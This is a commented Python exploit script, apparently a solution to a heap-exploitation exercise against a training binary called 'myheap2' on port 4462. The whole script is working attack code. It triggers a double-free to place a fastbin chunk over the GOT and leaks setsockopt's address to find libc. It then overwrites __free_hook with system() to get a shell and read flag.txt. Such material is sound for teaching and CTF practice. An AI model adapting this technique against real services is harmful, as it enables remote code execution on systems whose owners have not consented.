import sys
import struct
import socket

def p(a):
    return struct.pack('Q', a)

# Unlike myheap1, myheap2 does not contain any call to system().  This means
# that this time we do not have a PLT entry or GOT entry for system() at a
# known address. If we want to jump to system(), we need to leak the load
# address of the C library. Since the program now implements the 's' command to
# read the contents of a key, we can exploit the double-free vulnerability to
# create a fake chunk that overlaps the GOT. Reading the chunk will reveal the
# contents of the GOT.

host = sys.argv[1] if len(sys.argv) > 1 else 'localhost'
port = 4462

# from myheap2
free_hook      = 0x407070
setsockopt_got = 0x406f10
# from libc.so.6
setsockopt_off = 0xff410
system_off     = 0x48e50

# first part: leak the address of setsosockopt from the GOT
s = socket.create_connection((host, port))
# create a first object
s.send(b'cA08')
# create the fastbin loop
s.send(b'dA')
s.send(b'dA')
# create a new object of the same size (the address of A will be reused)
s.send(b'cB08')
# overwrite the 'fd' pointer with the address of the GOT entry of setsockopt
# (minus 16), call it X
s.send(b'aB' + p(setsockopt_got - 16))
# allocate a new object of the same size, thus moving the X address into the
# fastbin head
s.send(b'cC08')
# allocate yet another object of the same size. This will be at address X+16,
# thus overlapping the GOT entry of setsockopt.
s.send(b'cD08')
# read the last object. This will send us the address of setsockopt.
s.send(b'sD')
b = b''
while len(b) < 8:
    b += s.recv(8 - len(b))
setsockopt_addr = struct.unpack('Q', b[:8])[0]
print("setsockopt_addr: %x" % setsockopt_addr)
# The offset of setsockopt inside the libc is known from the libc.so.6 binary,
# so we can now obtain the load address of the libc.
libc_base = setsockopt_addr - setsockopt_off
print("libc_base: %x" % libc_base)
s.close()

# second part: jump to system
# Once we know the load address of libc we can reuse the same exploit of
# myheap1
s = socket.create_connection((host, port))
s.send(b'cA08')
s.send(b'dA')
s.send(b'dA')
s.send(b'cB08')
s.send(b'aB' + p(free_hook - 16))
s.send(b'cC08')
s.send(b'aC/bin/sh\0')
s.send(b'cD08')
s.send(b'aD' + p(libc_base + system_off))
s.send(b'dC')
s.send(b'/bin/cat flag.txt\n')
sys.stdout.buffer.write(s.recv(200))
